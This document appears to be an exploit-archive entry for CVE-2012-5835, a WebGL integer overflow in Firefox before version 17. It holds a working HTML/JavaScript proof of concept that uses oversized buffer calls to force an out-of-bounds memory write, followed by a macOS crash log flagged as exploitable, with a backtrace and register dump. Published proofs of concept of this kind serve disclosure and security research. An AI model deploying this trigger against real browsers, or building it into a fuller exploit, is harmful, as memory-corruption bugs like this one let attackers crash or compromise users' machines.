Proof of concept code demonstrating a WebGL integer overflow from 2012 in Mozilla Firefox versions prior to 17 and ESR 10.x versions before 10.0.11.
007ca774585a830b71b08631a7e5718fc0eb3a94767134d2128687b2e2c600e5
# Exploit Title: Integer overflow happens WebGL system in Mozila Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: (Originally Found by Google Project 0 team)Bikash Dash
#Tested On:MAC OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps(Mozila)
<html>
<head>
<script>
gl=document.createElement('canvas').getContext('experimental-webgl')
var buf = gl.createBuffer()
gl.bindBuffer(gl.ARRAY_BUFFER, buf)
var magic = 0x12345678
gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)
gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)
gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))
</script>
</head>
</html>
Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address. Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html
Process: firefox [3732]
Path: /Applications/Firefox.app/Contents/MacOS/firefox
Identifier: firefox
Version: ??? (???)
Code Type: X86-64 (Native)
Parent Process: exc_handler [3731]
Date/Time: 2017-02-15 10:44:52.818 +0300
OS Version: Mac OS X 10.8.1 (12B19)
Report Version: 9
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856
2 XUL 0x00000001020df955 0x10111a000 + 16537941
3 XUL 0x000000010257424b 0x10111a000 + 21340747
4 XUL 0x0000000102564622 0x10111a000 + 21276194
5 XUL 0x0000000102573ae2 0x10111a000 + 21338850
6 XUL 0x0000000102573ce9 0x10111a000 + 21339369
7 XUL 0x0000000102573fe5 0x10111a000 + 21340133
8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053
9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10 XUL 0x000000010182121d 0x10111a000 + 7369245
11 XUL 0x00000001015ef000 0x10111a000 + 5066752
12 XUL 0x00000001015f0538 0x10111a000 + 5072184
13 XUL 0x00000001015f117a 0x10111a000 + 5075322
14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869
15 XUL 0x00000001019a41b6 0x10111a000 + 8954294
16 XUL 0x00000001019a6285 0x10111a000 + 8962693
17 XUL 0x00000001019aa94d 0x10111a000 + 8980813
18 XUL 0x00000001021324f3 0x10111a000 + 16876787
19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366
20 XUL 0x0000000101f5b009 0x10111a000 + 14946313
21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759
22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789
25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685
30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31 XUL 0x0000000101f1e942 0x10111a000 + 14698818
32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517
33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821
34 XUL 0x0000000101d867b4 0x10111a000 + 13027252
35 XUL 0x0000000101121193 0x10111a000 + 29075
36 XUL 0x0000000101125fbb 0x10111a000 + 49083
37 XUL 0x00000001011264c3 XRE_main + 307
38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701
39 org.mozilla.firefox 0x0000000100001584 start + 52
Thread 0 crashed with X86 Thread State (64-bit):
rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001
rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0
r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678
r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001
rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678
Logical CPU: 2